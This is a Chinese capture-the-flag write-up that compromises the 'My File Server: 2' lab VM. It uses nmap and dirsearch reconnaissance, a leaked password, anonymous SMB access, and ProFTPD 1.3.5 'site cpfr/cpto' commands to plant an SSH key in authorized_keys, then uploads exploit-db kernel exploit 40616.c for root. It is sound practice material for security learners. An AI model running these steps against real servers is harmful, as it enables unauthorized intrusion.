My_file_server_2

description

Welcome to “My File Server : 2”
This boot2root machine is the Second Challenge of “My File Server” series. This is a realistic File Server with some intresting loop holes. As its name, you will get many File Sharing Services and their privileges to play.
Goal: Get the Root access of the Vulnerable Server.
Difficulty: Easy / Beginner Level
Need hints? Twitter @akankshavermasv
DHCP is enabled
Your feedback is really valuable for me! Twitter @akankshavermasv
Was there something that you didn’t like about this VM?
Please let me know so that I can make more interesting challenges in the future.
Good Luck..!!!

Write-UP

以下是虚拟机情况:

扫vmnet1:
hausa@debian:~$ fping -asg 172.16.1.1/24
172.16.1.1
172.16.1.131

扫172.16.1.131:
hausa@debian:~$ nmap -A -p 1-65535 172.16.1.131
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-16 02:30 EDT
Nmap scan report for 172.16.1.131
Host is up (0.00049s latency).
Not shown: 64523 filtered ports, 1004 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|drwxrwxrwx 3 0 0 16 Feb 19 07:48 pub [NSE: writeable]

……
22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048
……
80/tcp open http Apache httpd 2.4.6 ((CentOS))
……
445/tcp open netbios-ssn Samba smbd 4.9.1 (workgroup: SAMBA)
2049/tcp open nfs_acl 3 (RPC #100227)
2121/tcp open ftp ProFTPD 1.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can’t get directory listing: ERROR
20048/tcp open mountd 1-3 (RPC #100005)
Service Info: Host: FILESERVER; OS: Unix
Host script results:
|clock-skew: mean: -1h50m01s, deviation: 3h10m30s, median: -2s

| smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.1)
| Computer name: localhost
| NetBIOS computer name: FILESERVER\x00 | Domain name: \x00 | FQDN: localhost | System time: 2020-08-16T12:22:19+05:30
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-08-16T06:52:21
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1287.34 seconds

开了21/ftp(允许匿名登录),22/tcp,80/http,111/rpcbin,445/smb,2049/nfs_acl,2121/ftp(允许匿名登录),20048/mount。
从常规的80开始看。浏览器访问,没发现有用的信息。
dirsearch扫一下:
hausa@debian:~/tools/dirsearch$ python3 dirsearch.py -u 172.16.1.131 -e *
……
[06:51:04] 403 – 210B – /cgi-bin/
[06:51:05] 200 – 174B – /index.html
[06:51:07] 200 – 25B – /readme.txt
Task Completed

有一个readme.txt,访问得到:
My Password is
rootroot1

尝试用root/rootroot1登录22的ssh,公钥不对,登不上。
在ftp://172.16.1.131/pub/log/wtmp发现有用户smbuser:
hausa@debian:~/Downloads$ last -f wtmp
……
smbuser pts/1 192.168.1.5 Wed Feb 19 00:11 – 00:11 (00:00)
……

没有其他有用信息。
尝试用smbuser/rootroot1登录ftp,登不上。
尝试445/smb:
hausa@debian:~$ smbclient -L 172.16.1.131
Enter WORKGROUP\hausa’s password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
smbdata Disk smbdata
smbuser Disk smbuser
IPC$ IPC IPC Service (Samba 4.9.1)

SMB1 disabled — no workgroup available

smbuser/smbuser登录,获得sshd_config文件:
......
AuthorizedKeysFile .ssh/authorized_keys
......

把ssh-keygen生成的公钥传上去,再结合ProFTP1.3.5的未授权文件复制改掉公钥。
再登录ssh:
hausa@debian:~/.ssh$ ftp 172.16.1.131 2121
Connected to 172.16.1.131.
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [172.16.1.131]
Name (172.16.1.131:hausa): aefda
331 Password required for a
Password:
530 Login incorrect.
Login failed.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> site cpfr /smbdata/id_rsa.pub
350 File or directory exists, ready for destination name
ftp> site cpto /home/smbuser/.ssh/authorized_keys
250 Copy successful
ftp> exit
221 Goodbye.

hausa@debian:~/.ssh$ ssh -l smbuser 172.16.1.131
……
Last login: Mon Aug 17 00:44:30 2020

[smbuser@fileserver ~]$
拿到shell后,进行一系列检查,内核版本3.10.0,可提权。
通过smb上传文件,shell编译。
smb: > put /usr/share/exploitdb/exploits/linux/local/40616.c tiquan
putting file /usr/share/exploitdb/exploits/linux/local/40616.c as \tiquan (93.2 kb/s) (average 93.2 kb/s)

最终如下:

总结

~有的人用的扫描工具叫nbtscan和enum4linux,输出很详细,以后可以考虑用一用。
~对安全动态的关注  和  经常复现一些已知漏洞  很重要。
~有时可以试试用户名和密码相同。
~啥时候能挖个0day出来呢hhhh